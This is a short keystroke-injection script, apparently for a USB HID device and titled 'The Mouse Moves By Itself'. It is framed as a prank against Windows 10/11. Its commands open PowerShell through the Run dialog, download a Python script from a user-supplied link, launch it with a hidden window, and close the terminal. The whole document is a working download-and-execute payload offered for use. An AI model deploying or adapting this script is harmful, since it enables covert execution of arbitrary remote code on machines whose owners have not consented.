* ############################################
* #                                          |
* # Title        : The Mouse Moves By Itself |
* # Author       : Aleff                     |
* # Version      : 1.0                       |
* # Category     : Prank                     |
* # Target       : Windows 10/11             |
* #                                          |
* ############################################


* Requirements:
*     - Internet Connection


QUACK DELAY 1000
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell
QUACK ENTER
QUACK DELAY 500

* REQUIRED - Set your Python script link
QUACK STRING Invoke-WebRequest -Uri "SCRIPT-PY-LINK" -OutFile "script.py"
QUACK ENTER
QUACK DELAY 500

QUACK STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
QUACK ENTER
QUACK DELAY 1000
QUACK ALT F4
